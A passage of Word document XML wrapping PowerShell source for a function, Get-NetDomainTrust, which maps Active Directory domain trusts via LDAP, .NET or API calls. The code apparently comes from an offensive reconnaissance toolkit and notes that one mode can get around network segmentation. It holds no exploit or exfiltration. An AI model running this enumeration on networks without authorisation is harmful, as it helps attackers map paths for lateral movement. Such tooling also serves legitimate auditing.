    <w:p w14:paraId="7A5E3081" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A77C49F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBEAFB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="416738C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://DC=testlab,DC=local".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF8E59C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for global catalog queries ;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8D4C90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="19BF27AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561D8F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25CD294A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB5C024" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39991120" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4032CF9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7853B5D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72EF76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        More likely to get around network segmentation, but not as accurate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A59684B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3302EAB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F2AC9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25D51034" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DB5675" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E90AFDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB72705" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7060C926" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainTrust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C11AAF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CD7CE5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return domain trusts for the current domain using built in .NET methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E14DECA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61B3C1C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481DB354" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="367574A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainTrust -Domain "prod.testlab.local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53093463" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="232B8E43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return domain trusts for the "prod.testlab.local" domain using .NET methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD6114" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B8213B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183ADF9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25A19A93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainTrust -LDAP -Domain "prod.testlab.local" -DomainController "PRIMARY.testlab.local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3BBA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61324BEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197E2FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        queries, reflecting queries through the "Primary.testlab.local" domain controller,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEC1BF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        using .NET methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8B514" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5647B9E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B298B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1699BC96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainTrust -API -Domain "prod.testlab.local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E495FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="365B0066" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return domain trusts for the "prod.testlab.local" domain enumerated through API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2B1BB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CD28946" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E94E2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1868BEAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainTrust -API -DomainController WINDOWS2.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05680B1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="037EC1E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return domain trusts reachable from the WINDOWS2 machine through API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E0C1FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EB3F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CCA04C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D256901" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A4619" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199FF4F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28847C72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA6F268" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08AE8D8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7900D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C20F3F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="773B5038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39817539" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367ACF5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="207223D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D4B429" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $API,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C105B50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A8C04C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689FEB4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LDAP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A130559" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26C10465" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D26118" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E3BDB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F21A2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="63E3247D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFBAECC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D845B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B4C09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7220B8DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C607D41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TrustAttributes = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB207F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000001' = 'non_transitive'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E7A6F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000002' = 'uplevel_only'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCC8E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000004' = 'quarantined_domain'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB39C08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000008' = 'forest_transitive'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75CA81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000010' = 'cross_organization'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E68A69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000020' = 'within_forest'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258A5ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000040' = 'treat_as_external'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE24F63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000080' = 'trust_uses_rc4_encryption'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C5E15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000100' = 'trust_uses_aes_keys'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8232A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000200' = 'cross_organization_no_tgt_delegation'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE2780" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [uint32]'0x00000400' = 'pim_trust'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E5CDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535CDAB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F1E7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C812E87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E29C5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A950215" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(-not $Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217DD438" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if not domain is specified grab the current domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73433418" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SourceDomain = (Get-NetDomain -Credential $Credential).Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74326F0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB737B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA1836" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SourceDomain = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAFCA5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF2A68E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16EC507B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($LDAP -or $ADSPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D84FAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F75AD9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TrustSearcher = Get-DomainSearcher -Domain $SourceDomain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -ADSpath $ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20922CFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22D4C54C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SourceSID = Get-DomainSID -Domain $SourceDomain -DomainController $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A1B0DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="710A7688" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($TrustSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972295B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BA95BE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TrustSearcher.Filter = '(objectClass=trustedDomain)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B379092" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7DB2215A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $TrustSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6849D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A4BE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Props = $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440DF691" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B8EDDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8A4BA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TrustAttrib = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5784C54B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91AB9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E713F96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    $Direction = Switch ($Props.trustdirection) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A13503" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        0 { 'Disabled' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B6D8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        1 { 'Inbound' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1226ED01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        2 { 'Outbound' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5F01F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        3 { 'Bidirectional' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB99A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A28098" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ObjectGuid = New-Object Guid @(,$Props.objectguid[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C3AC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D701C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276B7527" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust | Add-Member Noteproperty 'SourceSID' $SourceSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A0E71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588E482" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DomainTrust | Add-Member Noteproperty 'TargetSID' $TargetSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB338CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
